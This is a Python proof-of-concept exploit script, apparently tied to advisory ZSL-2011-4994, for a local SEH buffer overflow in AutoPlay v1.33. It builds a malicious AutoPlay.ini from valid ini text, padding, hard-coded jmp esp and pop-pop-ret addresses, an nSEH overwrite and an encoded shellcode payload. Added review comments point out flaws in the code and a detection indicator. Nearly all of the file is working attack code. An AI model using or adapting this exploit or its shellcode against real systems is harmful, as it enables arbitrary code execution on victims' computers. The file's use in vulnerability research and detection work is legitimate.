#!/usr/bin/python
#
#
# AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)
#
#
# Vendor: Naugher Software
# Product web page: http://www.naughter.com
# Affected version: 1.33
#
# Summary: AutoPlay is a shareware application used for making
# autorun.ini files that can be edited and stored to compact disks.
#
# Desc: The program suffers from a buffer overflow vulnerability
# when opening an autorun file (.ini), as a result of adding extra
# bytes to parts of the edited file, giving attackers the
# possibility of arbitrary code execution on the affected
# system. The buffer overflow also allows the
# attacker to bypass the Structured Exception Handling (SEH)
# protection mechanism.
#
# Tested on: Microsoft Windows 7 Ultimate
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4994
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php
#
#
# 13.02.2011
#
# NOTE(review): proof-of-concept script for the advisory in the header above.
# Its only action is to write a crafted 'AutoPlay.ini' into the current
# working directory; it does not start or interact with the vulnerable
# application itself.
from struct import *   # unused: no struct.* name is referenced below

import time            # unused: never referenced below

# Opened in text mode. The data written below contains raw '\x0d\x0a' pairs
# and bytes above 0x7f, so the exact on-disk bytes depend on the interpreter's
# text-mode handling (Python 2 vs 3, platform newline translation); the
# interpreter/platform the author generated the file with is not stated.
f=open('AutoPlay.ini','w')


# Opaque payload appended after the SEH overwrite. What it does cannot be
# determined from this file alone; for defenders the literal byte sequence is
# only useful as an indicator of this particular PoC, not as documentation
# of its behaviour.
shell=('\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61'
'\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13'
'\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f'
'\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b'
'\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30'
'\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72'
'\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd'
'\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e'
'\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52'
'\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56');


# Ordinary-looking AutoPlay .ini content written as hex escapes. Decoded it
# is plain ASCII: a [General] section (Title, Icon, StartupSound, ExitSound,
# NumberOfButtons=7, BackgroundBitmap, NumberOfCombos=1), then a [Button1]
# section whose final key is 'FontName=' with no value -- the over-long
# value built below is appended straight onto it. Detection angle: an
# AutoPlay .ini whose FontName value is abnormally long (and non-ASCII)
# is the trigger condition described in the header.
head=('\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65'
'\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61'
'\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64'
'\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70'
'\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70'
'\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c'
'\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d'
'\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e'
'\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37'
'\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d'
'\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d'
'\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d'
'\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a'
'\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43'
'\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e'
'\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d'
'\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a'
'\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d'
'\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30'
'\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c'
'\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61'
'\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77'
'\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74'
'\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d'
'\x65\x3d')


junk='\x41'*32          # 32 bytes of 'A' padding
junk1='\x41'*92         # 92 bytes of 'A' padding
nseh='\xeb\x06\x90\x90' # overwrites the next-SEH slot (author's layout)
# NOTE(review): 'seh' and 'esp' are hard-coded addresses tied to the tested
# platform (Windows 7 Ultimate per the header). The module they were taken
# from is not stated in this file, and they are not portable across builds.
seh='\x62\xce\x86\x7c' # pop pop ret
esp='\x7b\x46\x86\x7c' # jmp esp
# Layout of the written file, in order: the valid ini text, padding, the
# 'jmp esp' address, more padding, the nSEH/SEH overwrite pair, the payload.
try:
    f.write(head+junk+esp+junk1+nseh+seh+shell)
    f.close()
    print('File created')
# Bare except: swallows every exception (including KeyboardInterrupt and
# SystemExit) behind a generic message, so the real cause of a failed write
# is lost; the file handle is also never closed on this path.
except:
    print('File cannot be created')